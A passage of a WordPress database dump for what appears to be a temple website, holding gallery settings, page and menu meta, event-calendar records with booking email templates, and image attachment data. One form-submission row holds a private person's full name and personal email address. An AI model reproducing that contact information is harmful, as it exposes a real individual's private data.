:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:23;a:10:{s:2:\"id\";s:6:\"125654\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_004-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:24;a:10:{s:2:\"id\";s:6:\"125653\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_003-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:25;a:10:{s:2:\"id\";s:6:\"125652\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_002-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:26;a:10:{s:2:\"id\";s:6:\"125651\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_001-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:27;a:10:{s:2:\"id\";s:6:\"124763\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_015--o\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:28;a:10:{s:2:\"id\";s:6:\"165287\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_070-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:29;a:10:{s:2:\"id\";s:6:\"165286\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_069-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:30;a:10:{s:2:\"id\";s:6:\"165285\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_068-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:31;a:10:{s:2:\"id\";s:6:\"165284\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_067-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:32;a:10:{s:2:\"id\";s:6:\"165283\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_066-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:33;a:10:{s:2:\"id\";s:6:\"165282\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_065-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:34;a:10:{s:2:\"id\";s:6:\"165281\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_064-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:35;a:10:{s:2:\"id\";s:6:\"165280\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_063-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:36;a:10:{s:2:\"id\";s:6:\"165279\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_062-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:37;a:10:{s:2:\"id\";s:6:\"165278\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_061-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:38;a:10:{s:2:\"id\";s:6:\"165277\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_060-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:39;a:10:{s:2:\"id\";s:6:\"165276\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_059-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:40;a:10:{s:2:\"id\";s:6:\"165275\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_058-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:41;a:10:{s:2:\"id\";s:6:\"165274\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_057-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:42;a:10:{s:2:\"id\";s:6:\"165273\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_056-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:43;a:10:{s:2:\"id\";s:6:\"165272\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_055-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:44;a:10:{s:2:\"id\";s:6:\"165271\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_054-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:45;a:10:{s:2:\"id\";s:6:\"165270\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_053-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:46;a:10:{s:2:\"id\";s:6:\"165269\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_052-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:47;a:10:{s:2:\"id\";s:6:\"165268\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_051-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:48;a:10:{s:2:\"id\";s:6:\"165267\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_050-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:49;a:10:{s:2:\"id\";s:6:\"165266\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_049-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:50;a:10:{s:2:\"id\";s:6:\"165265\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_048-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:51;a:10:{s:2:\"id\";s:6:\"165264\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_047-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:52;a:10:{s:2:\"id\";s:6:\"165263\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_046-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:53;a:10:{s:2:\"id\";s:6:\"165262\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_045-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:54;a:10:{s:2:\"id\";s:6:\"165261\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_044-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:55;a:10:{s:2:\"id\";s:6:\"165260\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_043-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:56;a:10:{s:2:\"id\";s:6:\"165259\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_042-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:57;a:10:{s:2:\"id\";s:6:\"165258\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_041-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:58;a:10:{s:2:\"id\";s:6:\"165257\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_040-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:59;a:10:{s:2:\"id\";s:6:\"165256\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_039-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:60;a:10:{s:2:\"id\";s:6:\"165255\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_038-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:61;a:10:{s:2:\"id\";s:6:\"165254\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_037-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:62;a:10:{s:2:\"id\";s:6:\"165253\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_036-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:63;a:10:{s:2:\"id\";s:6:\"165252\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_035-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:64;a:10:{s:2:\"id\";s:6:\"165251\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_034-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:65;a:10:{s:2:\"id\";s:6:\"165250\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_033-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:66;a:10:{s:2:\"id\";s:6:\"165249\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_032-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}i:67;a:10:{s:2:\"id\";s:6:\"165248\";s:3:\"alt\";s:0:\"\";s:5:\"title\";s:20:\"ECK_Temple_CO_031-lg\";s:11:\"description\";s:0:\"\";s:6:\"halign\";s:6:\"center\";s:6:\"valign\";s:6:\"middle\";s:4:\"link\";s:0:\"\";s:6:\"target\";i:0;s:5:\"width\";i:2;s:6:\"height\";i:2;}}'),(155534,266340,'protect_children',''),(155535,266340,'boldgrid_hide_page_title','0'),(155536,266340,'modula-settings','a:58:{s:4:\"type\";s:16:\"creative-gallery\";s:5:\"width\";s:4:\"100%\";s:6:\"height\";a:3:{i:0;i:800;i:1;i:800;i:2;i:800;}s:12:\"randomFactor\";i:50;s:8:\"lightbox\";s:8:\"fancybox\";s:15:\"show_navigation\";s:1:\"1\";s:7:\"shuffle\";s:1:\"0\";s:10:\"titleColor\";s:0:\"\";s:12:\"captionColor\";s:7:\"#ffffff\";s:10:\"hide_title\";s:1:\"1\";s:16:\"hide_description\";s:1:\"0\";s:15:\"captionFontSize\";i:14;s:13:\"titleFontSize\";i:0;s:21:\"mobileCaptionFontSize\";s:2:\"10\";s:19:\"mobileTitleFontSize\";s:2:\"12\";s:12:\"enableSocial\";s:1:\"0\";s:14:\"enableFacebook\";s:1:\"0\";s:14:\"enableLinkedin\";s:1:\"0\";s:15:\"enablePinterest\";s:1:\"0\";s:13:\"enableTwitter\";s:1:\"0\";s:14:\"enableWhatsapp\";s:1:\"0\";s:11:\"enableEmail\";s:1:\"0\";s:12:\"emailSubject\";s:31:\"Check out this awesome image !!\";s:12:\"emailMessage\";s:101:\"Here is the link to the image : %%image_link%% and this is the link to the gallery : %%gallery_link%%\";s:11:\"filterClick\";i:0;s:15:\"socialIconColor\";s:7:\"#ffffff\";s:14:\"socialIconSize\";i:16;s:17:\"socialIconPadding\";i:10;s:11:\"loadedScale\";i:100;s:6:\"inView\";s:1:\"0\";s:6:\"cursor\";s:7:\"zoom-in\";s:6:\"effect\";s:7:\"pufrobo\";s:11:\"borderColor\";s:7:\"#ffffff\";s:12:\"borderRadius\";i:0;s:10:\"borderSize\";i:0;s:11:\"shadowColor\";s:7:\"#ffffff\";s:10:\"shadowSize\";i:0;s:6:\"script\";s:0:\"\";s:5:\"style\";s:0:\"\";s:7:\"columns\";i:6;s:6:\"gutter\";s:2:\"10\";s:13:\"mobile_gutter\";s:2:\"10\";s:13:\"tablet_gutter\";s:2:\"10\";s:10:\"helpergrid\";i:0;s:9:\"lazy_load\";s:1:\"1\";s:9:\"grid_type\";s:9:\"automatic\";s:15:\"grid_image_size\";s:5:\"large\";s:15:\"grid_image_crop\";s:1:\"0\";s:21:\"grid_image_dimensions\";a:2:{s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}s:8:\"img_size\";s:3:\"200\";s:15:\"grid_row_height\";s:3:\"250\";s:21:\"grid_justify_last_row\";s:7:\"justify\";s:17:\"enable_responsive\";s:1:\"0\";s:10:\"powered_by\";s:1:\"0\";s:16:\"last_visited_tab\";s:17:\"modula-lightboxes\";s:8:\"img_crop\";s:1:\"1\";s:14:\"tablet_columns\";s:1:\"2\";s:14:\"mobile_columns\";s:1:\"1\";}'),(155537,266341,'_edit_lock','1646606339:2'),(155538,266341,'_edit_last','2'),(155539,266341,'_wp_page_template','default'),(155540,266341,'protect_children',''),(155541,266341,'passster_activate_global_protection',NULL),(155542,266341,'passster_activate_protection',NULL),(155543,266341,'passster_protection_type','password'),(155544,266341,'boldgrid_hide_page_title','0'),(155545,266341,'boldgrid_in_page_containers','1'),(155546,266341,'bgseo_robots_index','index'),(155547,266341,'bgseo_robots_follow','follow'),(155548,266343,'protect_children',''),(155549,266343,'passster_activate_global_protection',NULL),(155550,266343,'passster_activate_protection',NULL),(155551,266343,'passster_protection_type','password'),(155552,266343,'boldgrid_hide_page_title','0'),(155553,266343,'boldgrid_in_page_containers','1'),(155554,266343,'_menu_item_type','post_type'),(155555,266343,'_menu_item_menu_item_parent','0'),(155556,266343,'_menu_item_object_id','266341'),(155557,266343,'_menu_item_object','page'),(155558,266343,'_menu_item_target',''),(155559,266343,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(155560,266343,'_menu_item_xfn',''),(155561,266343,'_menu_item_url',''),(169038,33553,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(170809,267309,'mec_start_time_hour','10'),(155577,266352,'_field_425','Andre'),(155578,266352,'_field_426','Mugaruga'),(155579,266352,'_field_427','mugarugaandrew@gmail.com'),(155580,266352,'_form_id','46'),(155581,266352,'_seq_num','41'),(155582,266354,'passster_protection_type','password'),(155583,266354,'passster_activate_protection',NULL),(155584,266354,'passster_activate_global_protection',NULL),(155585,266354,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(155586,266354,'mec_display_cancellation_reason_in_single_page',''),(155587,266354,'mec_cancelled_reason',''),(155588,266354,'mec_moved_online_link',''),(155589,266354,'mec_event_status','EventScheduled'),(155590,266354,'mec_fields','a:0:{}'),(155591,266354,'mec_bfixed_fields','a:0:{}'),(155592,266354,'mec_public','1'),(155593,266354,'mec_countdown_method','global'),(155594,266354,'mec_timezone','global'),(155595,266354,'one_occurrence','0'),(155596,266354,'mec_additional_location_ids','a:0:{}'),(155597,266354,'mec_additional_organizer_ids','a:0:{}'),(155598,266354,'mec_currency','a:0:{}'),(155599,266354,'mec_cost',''),(155600,266354,'mec_more_info_target','_self'),(155601,266354,'mec_more_info_title',''),(155602,266354,'mec_more_info',''),(155603,266354,'mec_read_more',''),(155604,266354,'mec_event_date_submit','20210422105713'),(155605,266354,'mec_op','a:0:{}'),(155606,266354,'mec_reg_fields','a:0:{}'),(155607,266354,'mec_reg_fields_global_inheritance','1'),(155608,266354,'mec_ticket_variations','a:0:{}'),(155609,266354,'mec_ticket_variations_global_inheritance','1'),(155610,266354,'mec_fees','a:0:{}'),(155611,266354,'mec_fees_global_inheritance','1'),(155612,266354,'mec_tickets','a:0:{}'),(155613,266354,'mec_booking','a:0:{}'),(155614,266354,'mec_hourly_schedules','a:0:{}'),(155615,266354,'mec_not_in_days',''),(155616,266354,'mec_in_days',''),(155617,266354,'mec_repeat_type',''),(155618,266354,'mec_repeat_interval','1'),(155619,266354,'mec_repeat_end',''),(155620,266354,'mec_repeat_end_at_occurrences',''),(155621,266354,'mec_repeat_end_at_date',''),(155622,266354,'mec_advanced_days','a:0:{}'),(155623,266354,'mec_allday','0'),(155624,266354,'mec_hide_time','0'),(155625,266354,'mec_hide_end_time','0'),(155626,266354,'mec_comment',''),(155627,266354,'mec_repeat_status','0'),(155628,266354,'mec_certain_weekdays','a:0:{}'),(155629,266354,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(155630,266354,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-28\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-28\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(155631,266354,'protect_children',''),(155632,266354,'mec_color',''),(155633,266354,'mec_location_id','118'),(155634,266354,'mec_dont_show_map','1'),(155635,266354,'mec_organizer_id','1'),(155636,266354,'mec_start_date','2022-03-28'),(155637,266354,'mec_start_time_hour','7'),(155638,266354,'mec_start_time_minutes','0'),(155639,266354,'mec_start_time_ampm','PM'),(155640,266354,'mec_start_day_seconds','68400'),(155641,266354,'mec_end_date','2022-03-28'),(155642,266354,'mec_end_time_hour','8'),(155643,266354,'mec_end_time_minutes','0'),(155644,266354,'mec_end_time_ampm','PM'),(155645,266354,'mec_end_day_seconds','72000'),(155646,266354,'_dp_original','265756'),(155647,266354,'_edit_lock','1646785523:15'),(155648,266354,'_edit_last','15'),(155649,266355,'_wp_attached_file','2022/03/Dreams.webp'),(155650,266355,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:19:\"2022/03/Dreams.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Dreams-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Dreams-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:19:\"Dreams-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:19:\"Dreams-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:19:\"Dreams-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:19:\"Dreams-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(155651,266354,'_thumbnail_id','266355'),(155652,266355,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/03/Dreams.webp - cannot be optimized, it has an invalid file type'),(155653,266355,'smush-complete',''),(155654,266356,'passster_protection_type','password'),(155655,266356,'passster_activate_protection',NULL),(155656,266356,'passster_activate_global_protection',NULL),(155657,266356,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your 